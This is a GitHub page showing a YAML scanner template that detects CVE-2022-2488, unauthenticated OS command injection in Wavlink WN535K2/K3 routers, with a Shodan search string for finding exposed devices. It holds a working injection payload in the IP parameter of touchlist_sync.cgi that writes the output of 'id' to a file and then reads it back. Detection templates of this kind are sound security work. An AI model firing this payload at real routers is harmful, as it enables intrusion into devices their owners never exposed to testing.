-
Notifications
You must be signed in to change notification settings - Fork 16
/
CVE-2022-2488.yaml
32 lines (30 loc) · 1.26 KB
/
CVE-2022-2488.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
id: CVE-2022-2488
info:
name: Wavlink WN535K2/WN535K3 - OS Command Injection
author: For3stCo1d
severity: critical
verified: true
description: |
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
SHODAN: http.title:"Wi-Fi APP Login"
reference:
- https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
- https://vuldb.com/?id.204539
- https://nvd.nist.gov/vuln/detail/CVE-2022-2488
tags: cve,cve2022,iot,wavlink,router,rce,oast
created: 2023/06/22
set:
filename: randomLowercase(6)
rules:
r0:
request:
method: GET
path: /cgi-bin/touchlist_sync.cgi?IP=;id>./{{filename}}.txt;
expression: response.status == 500
r1:
request:
method: GET
path: /cgi-bin/{{filename}}.txt
expression: response.status == 200 && response.body.bcontains(b"uid=") && response.body.bcontains(b"gid=")
expression: r0() && r1()